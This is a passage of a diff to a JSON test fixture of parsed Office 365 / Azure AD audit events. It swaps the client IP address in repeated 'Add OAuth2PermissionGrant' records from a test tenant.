Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -23527,9 +23527,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:42", "ExtendedProperties": [ { @@ -23763,7 +23763,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -23793,9 +23793,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:42", "ExtendedProperties": [ { @@ -24029,7 +24029,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 